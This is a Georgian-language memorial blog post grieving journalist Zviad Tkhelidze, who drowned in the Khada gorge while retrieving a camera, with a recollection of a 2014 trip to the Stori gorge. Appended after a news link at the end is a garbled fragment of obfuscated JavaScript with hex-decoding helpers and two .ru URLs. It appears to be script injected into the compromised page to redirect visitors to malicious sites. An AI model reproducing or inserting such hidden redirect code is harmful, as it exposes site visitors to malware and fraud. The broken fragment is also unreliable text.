ორი დღის წინ, ელექტრონულ ფოსტაზე წერილი მომივიდა, სადაც ეწერა, რომ დუშეთის რაიონში, ხადას ხეობაში, მდინარემ მამაკაცი გაიტაცა… არ ვიცი, რატომ არ გამოვაქვეყნე… ხელი არ მომიტრიალდა, რატომღაც…. მოგვიანებით ვგებულობ, რომ ის ადამიანი, რომელიც მდინარემ გაიტაცა შენ ხარ – ზვიად თხელიძე – უზომოდ თავდადებული და მოყვარული შენი ქვეყნისა და საქმისა… და ამ ამბავს ეს მშრალი ნიუსი მამცნობს – ტელეკომპანია GDS-ის გადაცემა „2030“-ის ჟურნალისტი ზვიად თხელიძე უბედური შემთხვევის შედეგად, სამსახურებრივი მოვალეობის შესრულებისას, გარდაიცვალა.
ზვიად თხელიძეს დუშეთში, ხადას ხეობაში, მდინარეში გადასაღები აპარატი ჩაუვარდა. მისი ამოღების მცდელობისას კი მდინარეში ჩავარდა და დინებამ გაიტაცა. ადგილზე 50-მდე მაშველი მუშაობდა. გარდაცვლილი…იპოვეს.
არ ვიცი რა უნდა დავწერო, ან რა უნდა ვთქვა ისეთი, რომელიც ოდნავ მაინც შეუმსუბუქებს შენს დაკარგვას შენს ახლობლებს…
ვუსამძიმრებ მის ოჯახს, ყველა მის ახლობელს, თანამშრომელს, ყველა “მთავარ გაზეთელს”… – ის ჩვენი ოჯახის წევრი იყო და ასეც დარჩება – ჩვენი….
ეს ფოტო გადაღებულია, 2014 წლის ოქტომბრის ბოლოს, სტორის ხეობაში, როცა თუშეტისკენ მიმავალ გზაზე, სტორის ხეობაში ჟურნალისტებთან და “სენის” წარმომადგენლებთან ერთად, რეკრიაციულ ზონებს ვსწავლობდით და ვაზუსტებდით, სად უფრო კარგი იქნებოდა ტურისტებისთვის დასასვენებელი ადგილების მოწყობა, ისე, რომ ხეობის გარემოსთვის ზიანი არ მიეყენებინათ… ცოტა ხანში, იქ “სენის” ხელშეწყობით, კეთილმოეწყო კიდეც… იქ წასვლას კიდევ ვგეგმავდით… უსაზღვროდ უყვარდა და ტკიოდა სამშობლო… ბევრს მოგზაურობდა და მართლა ძალიან კარგ რეპორტაჟებს აკეთებდა…
ფოტოზე ზვიადი, მე და ზაზა ლაგაზიძეა.
http://www.palitratv.ge/akhali-ambebi/sazogadoeba/73463-emociuri-tsuthebi-2030-is-tsamyvanma-tragikulad-daghupuli-kolegis-samdzimari-dzlivs-gamoackhada.html// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698